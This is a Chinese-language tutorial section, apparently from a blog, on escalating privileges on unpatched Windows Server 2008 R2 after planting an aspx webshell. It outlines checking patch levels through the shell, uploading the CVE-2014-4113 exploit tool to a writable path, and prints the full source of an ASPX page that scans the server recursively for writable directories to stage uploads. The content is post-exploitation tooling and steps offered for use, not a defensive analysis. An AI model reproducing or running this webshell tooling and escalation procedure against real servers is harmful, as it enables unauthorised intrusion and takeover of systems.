第九节 winserver2008 r2 溢出提权

1. 简介

  在winserver2008 r2中,服务器默认是支持aspx的。所以默认都是可以执行一些命令。如果没有进行补丁修复可以利用一些溢出提权工具进行提权。

 

2. CVE-2014-4113-Exploit

  利用该提取工具对winserver2008进行溢出提权。

  

3. 利用过程

  通过aspxshell,输入/c Set查看系统信息(比如系统版本、补丁等情况)来决定是否利用该方法或者选择相应的提权版本。

  有时候路径访问没有权限,可以换其他的路径上传,上传成功后执行即可提权

 

4. 扫描可写硬盘

  上传该脚本(aspx)并访问它可以显示出所有可写目录

 1 <%@ Page Language="C#" ValidateRequest="false" %>
 2 <%@ Import Namespace="System.IO" %>
 3 <%@ Import Namespace="System.Text" %>
 4 
 5 
 6 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 7 <html xmlns="http://www.w3.org/1999/xhtml">
 8 <head runat="server">
 9     <title>ScanWrtieable</title>
10 </head>
11 <body>
12 
13     <script runat="server">
14     
15         protected void Page_Load(object sender, EventArgs e)
16         {
17         }
18         int cresults;
19         protected void ScanRights(DirectoryInfo cdir)
20         {
21              try
22              {
23                  if (Int32.Parse(TextBox_stopat.Text) > 0)
24                  {
25                      if (cresults > Int32.Parse(TextBox_stopat.Text))
26                          return;
27                  }
28                 DirectoryInfo[] subdirs = cdir.GetDirectories();
29                 foreach (DirectoryInfo item in subdirs)
30                 {
31                     ScanRights(item);
32                 }
33 
34                 File.Create(cdir.FullName + "\\test").Close();
35                
36                     this.Lb_msg.Text += cdir.FullName+"<br/>";
37                     cresults++;
38                     File.Delete(cdir.FullName + "\\test");
39 
40              }
41 
42              catch { }
43         }
44         System.DateTime start = DateTime.Now;
45         protected void ClearAllThread_Click(object sender, EventArgs e)
46         {
47             this.Lb_msg .Text= "";
48             cresults = 0;
49             ScanRights(new DirectoryInfo(Fport_TextBox.Text));
50             TimeSpan usetime = System.DateTime.Now - start;
51             this.Lb_msg.Text +="usetime: "+ usetime.TotalSeconds.ToString();
52         }
53         
54 
55     </script>
56 
57     <form id="form1" runat="server">
58    
59     <div>
60          start<asp:TextBox ID="Fport_TextBox" runat="server" Text="c:\" Width="60px"></asp:TextBox>&nbsp;&nbsp; 
61          Stopat <asp:TextBox ID="TextBox_stopat" runat="server" Text="5" Width="60px"></asp:TextBox>files
62         <asp:Button ID="Button" runat="server" OnClick="ClearAllThread_Click" Text="ScanWriterable" /><br />
63         <asp:Label ID="Lb_msg" runat="server" Text=""></asp:Label>
64         <br />
65         &nbsp;</div>
66          <div>Code By <a href ="http://www.hkmjj.com">Www.hkmjj.Com</a></div>
67     </form>
68 </body>
69 </html>

 

第九节 winserver2008 r2 溢出提权

上一篇:linux搭建YAPI


下一篇:java字符编码转换研究(转) - lxzh504 - 博客园